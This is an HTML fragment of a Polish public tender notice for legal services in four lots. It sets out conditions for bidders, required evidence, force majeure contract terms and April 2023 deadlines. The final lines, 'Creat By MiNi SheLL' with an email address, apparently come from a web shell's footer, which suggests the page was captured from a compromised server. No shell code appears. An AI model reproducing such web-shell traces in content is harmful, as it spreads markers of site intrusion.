pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> postępowaniu o udzielenie zamówienia publicznego udział mogą brać wykonawcy, którzy spełniają warunki udziału w zakresie: <br/>3.1.1.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów w zakresie wszystkich zadań:<br/>3.1.1.1.	Wykonawca spełni warunek jeżeli wykaże, że posiada uprawnienia do wykonywania zawodu radcy prawnego zgodnie z ustawą z dnia 6 lipca 1982 r. o radcach prawnych (t.j. Dz.U. z 2020 r. poz. 75 z późn. zm.) lub zawodu adwokata zgodnie z ustawą z dnia 26 maja 1982 r. Prawo o adwokaturze (t.j. Dz.U. z 2020 r. poz. 1651 z późn. zm.) lub jest prawnikiem zagranicznym wykonującym stałą praktykę na podstawie ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej (t.j. Dz.U. z 2020 r. poz. 823 z późn. zm.) oraz posiada wpis na odpowiednią listę potwierdzającą wykonywanie zawodu adwokata lub radcy prawnego lub jako prawnik zagraniczny<br/>3.1.2.	sytuacji ekonomicznej lub finansowej. W tym zakresie Zamawiający wymaga aby Wykonawca w zakresie wszystkich zadań:<br/>3.1.2.1.	wykazał, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 1 000 000,00 zł. <br/>3.1.3.	Zdolności technicznej lub zawodowej. W tym zakresie Zamawiający wymaga aby Wykonawca:<br/>3.1.3.1.	posiadał wiedzę i doświadczenie niezbędne do wykonania zamówienia, tj. wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie) należycie wykonał lub wykonuje:<br/>3.1.3.1.1.	w zakresie zdania 1 <br/>3.1.3.1.1.1.	min. 1 (jedną) usługę obsługi prawnej podmiotu publicznego w zakresie prawa pracy, świadczoną nieprzerwanie przez okres co najmniej 30 dni.<br/>3.1.3.1.1.2.	10 regulaminów dla podmiotu publicznego mających przynajmniej 2 działy, zatrudniających pracowników w różnych systemach pracy. W tym 2 regulaminu w oparciu o ponadzakładowy układ pracy.<br/>3.1.3.1.2.	W zakresie zadania 2 min. 2 (dwie) usługi obsługi prawnej podmiotu publicznego wykonującego zadania z zakresu ochrony przyrody w oparciu o kodeks cywilny, świadczoną nieprzerwanie przez okres co najmniej 2 miesięcy. Pod pojęciem zakresu doradztwa w oparciu o kodeks cywilny Zamawiający rozumie m.in.:<br/>3.1.3.1.2.1.	Sporządzanie projektów umów do przeprowadzania przetargów na udostępnianie nieruchomości <br/>3.1.3.1.2.2.	Prowadzenie spraw związanych z ustanawianiem służebności<br/>3.1.3.1.2.3.	Doradztwo w zakresie regulacji stanu prawnego nieruchomości oraz procesu wykupu i wymiany nieruchomości<br/>3.1.3.1.2.4.	Doradztwo przy pisaniu decyzji, postanowień, odwołań, zażaleń i skarg związanych zakresem działania Działu Udostępniania i Zespołu Zagospodarowania Przestrzennego i Stanu Posiadania<br/>3.1.3.1.3.	W zakresie zadania 3 min. 1 (jedną) usługę polegającą na wykonaniu audytu podatkowego dla podmiotu publicznego polegającego na analizie deklaracji na podatek od nieruchomości, leśny i rolny w kontekście ich poprawności oraz analizie zakresu nieruchomości (oraz budynków - powierzchnia użytkowa, powierzchnia zajęta na kancelarii i budowli) ujętych w tych deklaracjach z uwzględnieniem zwolnień we wszystkich typach podatku oraz odzyskiwanie należności podatkowych w związku z zawartymi umowami na udostępnienie nieruchomości osobom trzecim<br/>3.1.3.1.4.	W zakresie zadania 4 min. 1 (jedną) usługę obsługi prawnej podmiotu publicznego w zakresie prowadzenia postępowania polegającego na wdrożeniu stron internetowych o wartości min. 200000 zł brutto polegające m.in. na tworzeniu umów, doradztwie prawnym, przygotowaniu pism i opinii <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.3.	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; (wzór wykazu dostaw będzie przekazany przez Zamawiającego wraz z wezwaniem, o którym mowa powyżej w pkt. 3);<br/>3.1.	dokumentów potwierdzającego uprawnienia do wykonywania zawodu radcy prawnego zgodnie z ustawą z dnia 6 lipca 1982 r. o radcach prawnych (t.j. Dz.U. z 2020 r. poz. 75 z późn. zm.) lub zawodu adwokata zgodnie z ustawą z dnia 26 maja 1982 r. Prawo o adwokaturze (t.j. Dz.U. z 2020 r. poz. 1651 z późn. zm.) lub bycia prawnikiem zagranicznym wykonującym stałą praktykę na podstawie ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej (t.j. Dz.U. z 2020 r. poz. 823 z późn. zm.) oraz posiadania wpisu na odpowiednią listę potwierdzającą wykonywanie zawodu adwokata lub radcy prawnego lub jako prawnik zagraniczny<br/>3.2.	dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> NIE DOTYCZY <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> OPISANO W SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony nie ponoszą odpowiedzialności za naruszenie obowiązków wynikających z umowy <br/>w przypadku, gdy wyłączną przyczyną naruszenia jest działanie siły wyższej niewystępującej w chwili zawarcia umowy i zostanie wykazany związek przyczynowy pomiędzy niewykonaniem umowy lub nienależytym wykonaniem umowy, a wystąpieniem tej siły wyższej.<br/>2.	Przez siłę wyższą rozumie się zdarzenie zewnętrzne, bądź połączenie zdarzeń zewnętrznych lub okoliczności niezależnych od stron, które istotnie i obiektywnie utrudniają lub obiektywnie uniemożliwiają wykonywanie zobowiązań danej strony wynikających z umowy, a których dana strona nie mogła przewidzieć mając na uwadze stan istniejący w chwili zawarcia umowy, ani im zapobiec lub przezwyciężyć poprzez działanie z dochowaniem należytej staranności. <br/>3.	Zdarzeniami kwalifikowanymi jako przypadki siły wyższej są w szczególności klęski żywiołowe takie jak: pożary, powodzie, trzęsienia ziemi, wybuchy wulkanów, wybuchy epidemii, a także strajki generalne, działania zbrojne w skali państwowej, akty terrorystyczne, działania organów władzy państwowej polegające na ograniczeniu praw lub wolności ludzi, w szczególności działania wynikające z wprowadzenia stanu wyjątkowego, epidemicznego, blokady granic państwowych, wprowadzenie zakazów eksportu czy importu, zakazu przemieszczania się ludzi itp. <br/>4.	Strony mają obowiązek wzajemnego informowania się o wystąpieniu i ustaniu zdarzeń będących siłą wyższą, chyba że informacja taka podana została do wiadomości ogółu przez organy władzy publicznej.<br/>5.	Strona dotknięta siłą wyższą obowiązana jest do podjęcia działań minimalizujących skutki działania siły wyższej. <br/>6.	Nie można powoływać się na siłę wyższą, jeżeli skutkom zdarzenia zewnętrznego, niemożliwego do przewidzenia, strona umowy mogła zapobiec bez narażania na uszczerbek zdrowia i życia ludzi, postępując zgodnie z obowiązującymi przepisami. Na siłę wyższą nie można powoływać się również wówczas, gdy występowała ona w chwili zawarcia umowy.<br/>7.	Po ustąpieniu przeszkody w postaci siły wyższej strony powinny wykonać swoje zobowiązania wynikające z zawartej umowy. Jeżeli z powodu działania siły wyższej realizacja umowy stanie się dla którejś ze stron niecelowa, każdej ze stron przysługiwało będzie prawo rozwiązania umowy bez zachowania okresu wypowiedzenia. Prawo to przysługuje w okresie 14 dni od daty ustania siły wyższej pod warunkiem wykazania związku przyczynowego pomiędzy siłą wyższą, a rozwiązaniem umowy. W takim przypadku nie nalicza się kar umownych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">EZAMOWIENIA</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-04 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Termin realizacji przedmiotu zamówienia: 8 miesięcy od daty podpisania umowy, jednak nie dłużej niż do 31.12.2023. <br/>2.	Zamawiający przewiduje przedłużenie czasu trwania zamówienia w przypadku, gdy Wykonawca rozpocznie procedowanie nowego zadania/ sprawy w trakcie obowiązywania obecnej umowy i będzie musiał ją dokończyć. Wówczas Zamawiający przedłuży umowę o niezbędny czas do dokończenia danego zadania/ sprawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com